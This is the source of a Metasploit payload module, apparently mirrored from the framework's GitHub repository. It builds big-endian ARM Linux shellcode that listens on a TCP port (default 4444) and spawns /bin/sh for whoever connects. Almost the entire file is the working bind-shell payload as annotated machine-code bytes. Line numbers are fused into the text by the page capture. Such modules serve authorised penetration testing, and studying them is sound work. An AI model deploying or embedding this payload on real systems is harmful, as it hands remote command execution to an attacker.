Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 118910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',17'Description' => 'Listen for a connection and spawn a command shell',18'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',19'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],20'License' => MSF_LICENSE,21'Platform' => 'linux',22'Arch' => ARCH_ARMBE,23'Handler' => Msf::Handler::BindTcp,24'Session' => Msf::Sessions::CommandShellUnix25))26# Register command execution options27register_options(28[29OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]),30Opt::LPORT(4444)31])32end33def generate(_opts = {})34cmd = (datastore['CMD'] || '') + "\x00"35bytehigh = (datastore['LPORT'].to_i >> 8).chr36bytelow = (datastore['LPORT'].to_i & 0xFF).chr3738payload =39# turning on thumb mode40"\xe2\x8f\x60\x01" + # add r6, pc, #1 #41"\xe1\x2f\xff\x16" + # bx r6 #4243# thumb mode on44# socket(2,1,0)45"\x1a\x92" + # sub r2, r2, r2 #46"\x1c\x51" + # add r1, r2, #1 #47"\x1c\x90" + # add r0, r2, #2 #48"\x02\x0f" + # lsl r7, r1, #8 #49"\x37\x19" + # add r7, r7, #0x19 #50"\xdf\x01" + # svc 1 #51"\x1c\x06" + # mov r6, r0 #5253# bind()54"\x22\x02" + # mov r2, #2 #55"\x02\x12" + # lsl r2, r2, #8 #56"\x32"+bytehigh + # add r2, r2, #0xXX #57"\x02\x12" + # lsl r2, r2, #8 #58"\x32"+bytelow + # add r2, r2, #0xXX #59"\x1a\xdb" + # sub r3, r3, r3 #60"\x1b\x24" + # sub r4, r4, r4 #61"\x1b\x6d" + # sub r5, r5, r5 #62"\x46\x69" + # mov r1, sp #63"\xc1\x3c" + # stm r1!, {r2-r5} #64"\x39\x10" + # sub r1, #0x10 #65"\x22\x10" + # mov r2, #16 #66"\x37\x01" + # add r7, r7, #1 #67"\xdf\x01" + # svc 1 #6869# listen()70"\x1c\x30" + # mov r0, r6 #71"\x1a\x49" + # sub r1, r1, r1 #72"\x37\x02" + # add r7, r7, #2 #73"\xdf\x01" + # svc 1 #7475# accept()76"\x1c\x30" + # mov r0, r6 #77"\x1a\x92" + # sub r2, r2, r2 #78"\x37\x01" + # add r7, r7, #1 #79"\xdf\x01" + # svc 1 #80"\x1c\x06" + # mov r6, r0 #8182# dup2()83"\x1a\x49" + # sub r1, r1, r1 #84"\x27\x3f" + # mov r7, #63 #85"\xdf\x01" + # svc 1 #86"\x1c\x30" + # mov r0, r6 #87"\x31\x01" + # add r1, r1, #1 #88"\xdf\x01" + # svc 1 #89"\x1c\x30" + # mov r0, r6 #90"\x31\x01" + # add r1, r1, #1 #91"\xdf\x01" + # svc 1 #9293# execve()94"\x1a\x92" + # sub r2, r2, r2 #95"\x46\x78" + # mov r0, pc #96"\x30\x12" + # add r0, #18 #97"\x92\x02" + # str r2, [sp, #8] #98"\x90\x01" + # str r0, [sp, #4] #99"\xa9\x01" + # add r1, sp, #4 #100"\x27\x0b" + # mov r7, #11 #101"\xdf\x01" + # svc 1 #102103# exit()104"\x1b\x24" + # sub r4, r4, r4 #105"\x1c\x20" + # mov r0, r4 #106"\x27\x01" + # mov r7, #1 #107"\xdf\x01" + # svc 1 #108cmd109end110end111112113